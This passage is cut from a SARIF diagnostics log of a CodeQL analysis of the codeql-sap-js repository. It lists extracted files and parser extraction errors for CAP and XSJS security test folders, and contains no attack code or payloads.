"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5-webcomponents/test/queries/xss-input-dangerouslySetInnerHTML/src/App.tsx","uriBaseId":"%SRCROOT%","index":594}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5-webcomponents/test/queries/xss-input-dangerouslySetInnerHTML/src/index.tsx","uriBaseId":"%SRCROOT%","index":595}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/lib/codeql-pack.lock.yml","uriBaseId":"%SRCROOT%","index":596}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/lib/qlpack.yml","uriBaseId":"%SRCROOT%","index":597}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/src/codeql-pack.lock.yml","uriBaseId":"%SRCROOT%","index":598}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/src/qlpack.yml","uriBaseId":"%SRCROOT%","index":599}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/codeql-pack.lock.yml","uriBaseId":"%SRCROOT%","index":600}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/qlpack.yml","uriBaseId":"%SRCROOT%","index":601}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSAccess/service/.xsaccess","uriBaseId":"%SRCROOT%","index":602}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSAccess/service/exposed/.xsaccess","uriBaseId":"%SRCROOT%","index":603}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSAccess/service/missing_auth/.xsaccess","uriBaseId":"%SRCROOT%","index":604}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSAccess/service/service.xsjs","uriBaseId":"%SRCROOT%","index":605}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSAccess/service/xs-app.json","uriBaseId":"%SRCROOT%","index":606}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSReflectedXss/XSJSReflectedXss.xsjs","uriBaseId":"%SRCROOT%","index":607}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSSqlInjection/XSJSSqlInjection.xsjs","uriBaseId":"%SRCROOT%","index":608}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSUrlRedirect/XSJSUrlRedirect.xsjs","uriBaseId":"%SRCROOT%","index":609}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSZipSlip/XSJSZipSlip.xsjs","uriBaseId":"%SRCROOT%","index":610}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/heuristic-models/tests/Sources/test.js","uriBaseId":"%SRCROOT%","index":3}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/heuristic-models/tests/codeql-pack.lock.yml","uriBaseId":"%SRCROOT%","index":611}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/heuristic-models/tests/qlpack.yml","uriBaseId":"%SRCROOT%","index":612}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"qlt.conf.json","uriBaseId":"%SRCROOT%","index":613}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/db/schema.cds","uriBaseId":"%SRCROOT%","index":104},"region":{"startLine":1,"startColumn":2,"endColumn":3}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/db/schema.cds with error Error: Expected u found a"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/db/schema.cds with error Error: Expected u found a"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service1.cds","uriBaseId":"%SRCROOT%","index":110},"region":{"startLine":1,"endColumn":2}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service1.cds with error Error: Unexpected token"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service1.cds with error Error: Unexpected token"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service2.cds","uriBaseId":"%SRCROOT%","index":111},"region":{"startLine":1,"endColumn":2}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service2.cds with error Error: Unexpected token"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service2.cds with error Error: Unexpected token"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service3.cds","uriBaseId":"%SRCROOT%","index":113},"region":{"startLine":1,"endColumn":2}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service3.cds with error Error: Unexpected token"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service3.cds with error Error: Unexpected token"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/db/schema.cds","uriBaseId":"%SRCROOT%","index":114},"region":{"startLine":1,"startColumn":2,"endColumn":3}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/db/schema.cds with error Error: Expected u found a"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/db/schema.cds with error Error: Expected u found a"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service1.cds","uriBaseId":"%SRCROOT%","index":119},"region":{"startLine":1,"endColumn":2}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service1.cds with error Error: Unexpected token"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service1.cds with error Error: Unexpected token"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service2.cds","uriBaseId":"%SRCROOT%","index":121},"region":{"startLine":1,"endColumn":2}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service2.cds with error Error: Unexpected token"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service2.cds with error Error: Unexpected token"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz-cds-serve/db/schema.cds","uriBaseId":"%SRCROOT%","index":123},"region":{"startLine":1,"startColumn":2,"endColumn":3}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz-cds-serve/db/schema.cds with error Error: Expected u found a"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz-cds-serve/db/schema.cds with error Error: Expected u found a"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz-cds-serve/srv/service1.cds","uriBaseId":"%SRCROOT%","index":127},"region":{"startLine":1,"endColumn":2}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz-cds-serve/srv/service1.cds with error Error: Unexpected token"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz-cds-serve/srv/service1.cds with error Error: Unexpected token"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz-cds-serve/srv/service2.cds","uriBaseId":"%SRCROOT%","index":129},"region":{"startLine":1,"endColumn":2}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz-cds-serve/srv/service2.cds with error Error: Unexpected token"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz-cds-serve/srv/service2.cds with error Error: Unexpected token"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/db/schema.cds","uriBaseId":"%SRCROOT%","index":131},"region":{"startLine":1,"startColumn":2,"endColumn":3}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/db/schema.cds with error Error: Expected u found a"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/db/schema.cds with error Error: Expected u found a"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service1.cds","uriBaseId":"%SRCROOT%","index":135},"region":{"startLine":1,"endColumn":2}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service1.cds with error Error: Unexpected token"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service1.cds with error Error: Unexpected token"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service2.cds","uriBaseId":"%SRCROOT%","index":137},"region":{"startLine":1,"endColumn":2}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service2.cds with error Error: Unexpected token"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service2.cds with error Error: Unexpected token"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/db/schema.cds","uriBaseId":"%SRCROOT%","index":139},"region":{"startLine":1,"startColumn":2,"endColumn":3}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/db/schema.cds with error Error: Expected u found a"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/db/schema.cds with error Error: Expected u found a"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service1.cds","uriBaseId":"%SRCROOT%","index":143},"region":{"startLine":1,"endColumn":2}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service1.cds with error Error: Unexpected token"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service1.cds with error Error: Unexpected token"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service2.cds","uriBaseId":"%SRCROOT%","index":145},"region":{"startLine":1,"endColumn":2}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service2.cds with error Error: Unexpected token"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service2.cds with error Error: Unexpected token"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/db/schema.cds","uriBaseId":"%SRCROOT%","index":147},"region":{"startLine":1,"startColumn":2,"endColumn":3}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/db/schema.cds with error Error: Expected u found a"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/db/schema.cds with error Error: Expected u found a"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/srv/service1.cds","uriBaseId":"%SRCROOT%","index":154},"region":{"startLine":1,"endColumn":2}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/srv/service1.cds with error Error: Unexpected token"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/srv/service1.cds with error Error: Unexpected token"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/srv/service2.cds","uriBaseId":"%SRCROOT%","index":155},"region":{"startLine":1,"endColumn":2}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/srv/service2.cds with error Error: Unexpected token"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/srv/service2.cds with error Error: Unexpected token"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/db/schema.cds","uriBaseId":"%SRCROOT%","index":157},"region":{"startLine":1,"startColumn":2,"endColumn":3}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/db/schema.cds with error Error: Expected u found a"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/db/schema.cds with error Error: Expected u found a"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service1.cds","uriBaseId":"%SRCROOT%","index":162},"region":{"startLine":1,"endColumn":2}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service1.cds with error Error: Unexpected token"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service1.cds with error Error: Unexpected token"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service2.cds","uriBaseId":"%SRCROOT%","index":163},"region":{"startLine":1,"endColumn":2}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service2.cds with error Error: Unexpected token"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service2.cds with error Error: Unexpected token"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/db/schema.cds","uriBaseId":"%SRCROOT%","index":166},"region":{"startLine":1,"startColumn":2,"endColumn":3}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/db/schema.cds with error Error: Expected u found a"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/db/schema.cds with error Error: Expected u found a"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service1.cds","uriBaseId":"%SRCROOT%","index":169},"region":{"startLine":1,"endColumn":2}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service1.cds with error Error: Unexpected token"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service1.cds with error Error: Unexpected token"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service2.cds","uriBaseId":"%SRCROOT%","index":171},"region":{"startLine":1,"endColumn":2}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service2.cds with error Error: Unexpected token"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service2.cds with error Error: Unexpected token"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/db/schema.cds","uriBaseId":"%SRCROOT%","index":173},"region":{"startLine":1,"startColumn":2,"endColumn":3}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/db/schema.cds with error Error: Expected u found a"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/db/schema.cds with error Error: Expected u found a"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service1.cds","uriBaseId":"%SRCROOT%","index":177},"region":{"startLine":1,"endColumn":2}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service1.cds with error Error: Unexpected token"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service1.cds with error Error: Unexpected token"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/db/schema.cds","uriBaseId":"%SRCROOT%","index":180},"region":{"startLine":1,"startColumn":2,"endColumn":3}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/cqlinjection/db/schema.cds with error 